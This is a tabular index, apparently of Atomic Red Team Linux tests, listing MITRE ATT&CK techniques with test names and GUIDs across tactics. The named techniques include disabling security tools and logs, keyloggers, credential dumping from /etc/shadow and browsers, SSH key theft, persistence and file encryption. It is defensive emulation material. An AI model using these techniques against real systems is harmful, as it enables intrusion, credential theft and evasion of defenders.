39 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
40 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
41 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
42 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
43 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
44 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
45 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 8 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
46 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 9 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
47 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 10 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
48 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 11 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
49 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 12 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
50 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 13 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
51 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 14 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
52 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 15 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
53 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
54 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
55 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
56 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
57 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
58 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
59 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
60 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
61 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
62 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 2 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
63 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
64 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
65 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
66 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
67 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
68 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
69 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
70 defense-evasion T1036.003 Masquerading: Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
71 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
72 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
73 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
74 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
75 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
76 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
77 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
78 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
79 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 bash
80 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
81 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
82 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
83 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
84 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
85 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
86 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
87 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
88 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
89 collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
90 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
91 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
92 collection T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
93 collection T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
94 collection T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
95 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
96 collection T1115 Clipboard Data 5 Add or copy content to clipboard with xClip ee363e53-b083-4230-aff3-f8d955f2d5bb sh
97 collection T1560.002 Archive Collected Data: Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
98 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
99 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
100 collection T1560.002 Archive Collected Data: Archive via Library 4 Compressing data using tarfile in Python (Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db bash
101 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
102 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
103 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
104 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
105 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
106 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
107 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
108 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
109 persistence T1546.005 Event Triggered Execution: Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
110 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
111 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
112 persistence T1136.001 Create Account: Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
113 persistence T1136.001 Create Account: Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
114 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
115 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
116 persistence T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
117 persistence T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
118 persistence T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
119 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
120 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
121 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
122 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
123 persistence T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
124 persistence T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
125 persistence T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
126 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
127 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
128 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
129 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
130 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
131 privilege-escalation T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
132 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
133 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
134 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
135 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
136 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
137 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
138 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
139 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
140 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
141 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
142 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
143 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
144 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
145 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
146 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
147 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
148 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
149 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
150 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
151 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
152 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
153 credential-access T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
154 credential-access T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
155 credential-access T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
156 credential-access T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
157 credential-access T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
158 credential-access T1110.001 Brute Force: Password Guessing 4 SUDO brute force Debian 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a sh
159 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO brute force Redhat b72958a7-53e3-4809-9ee1-58f6ecd99ade sh
160 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
161 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
162 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
163 credential-access T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
164 credential-access T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
165 credential-access T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
166 credential-access T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
167 credential-access T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
168 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
169 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
170 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
171 credential-access T1552.004 Unsecured Credentials: Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
172 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
173 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
174 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
175 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
176 credential-access T1552.001 Unsecured Credentials: Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
177 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
178 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
179 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 2 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
180 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 3 Access /etc/{shadow,passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a bash
181 credential-access T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow 4 Access /etc/{shadow,passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 bash
182 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
183 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
184 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
185 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
186 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
187 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
188 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
189 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
190 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
191 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
192 discovery T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
193 discovery T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
194 discovery T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
195 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
196 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
197 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
198 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
199 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
200 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
201 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
202 discovery T1082 System Information Discovery 24 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
203 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
204 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
205 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
206 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
207 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
208 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
209 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
210 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
211 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
212 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
213 discovery T1201 Password Policy Discovery 4 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
214 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
215 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
216 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
217 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
218 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
219 discovery T1018 Remote System Discovery 14 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
220 discovery T1046 Network Service Scanning 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
221 discovery T1046 Network Service Scanning 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
222 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
223 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
224 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
225 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
226 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
227 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
228 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
229 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
230 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
231 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
232 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
233 command-and-control T1105 Ingress Tool Transfer 27 Linux Download File and Run bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 sh
234 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
235 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
236 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
237 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
238 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
239 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
240 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
241 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
